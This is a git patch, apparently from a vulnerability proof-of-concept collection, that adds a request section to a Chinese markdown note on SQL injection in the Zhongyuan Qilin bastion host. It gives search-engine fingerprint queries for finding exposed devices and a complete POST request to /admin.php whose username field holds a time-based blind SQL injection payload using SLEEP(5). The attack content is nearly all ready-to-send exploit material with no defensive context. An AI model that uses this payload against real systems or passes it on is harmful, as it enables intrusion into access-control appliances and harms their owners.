From 2496f1ac57e582f63cecedf85c88e9bb1612edf6 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 14 Sep 2023 17:50:04 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E4=B8=AD=E8=BF=9C=E9=BA=92=E9=BA=9F?= =?UTF-8?q?=E5=A0=A1=E5=9E=92=E6=9C=BASQL=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 中远麒麟堡垒机SQL注入.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/中远麒麟堡垒机SQL注入.md b/中远麒麟堡垒机SQL注入.md
index 6fd03cf..fd457ee 100644
--- a/中远麒麟堡垒机SQL注入.md
+++ b/中远麒麟堡垒机SQL注入.md
@@ -33,3 +33,16 @@ poc:
 检索条件: cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth" 或 body="admin.php?controller=admin_index&action=login"
+## 请求包
+```
+POST /admin.php?controller=admin_commonuser HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Connection: close
+Content-Length: 78
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+
+username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
+```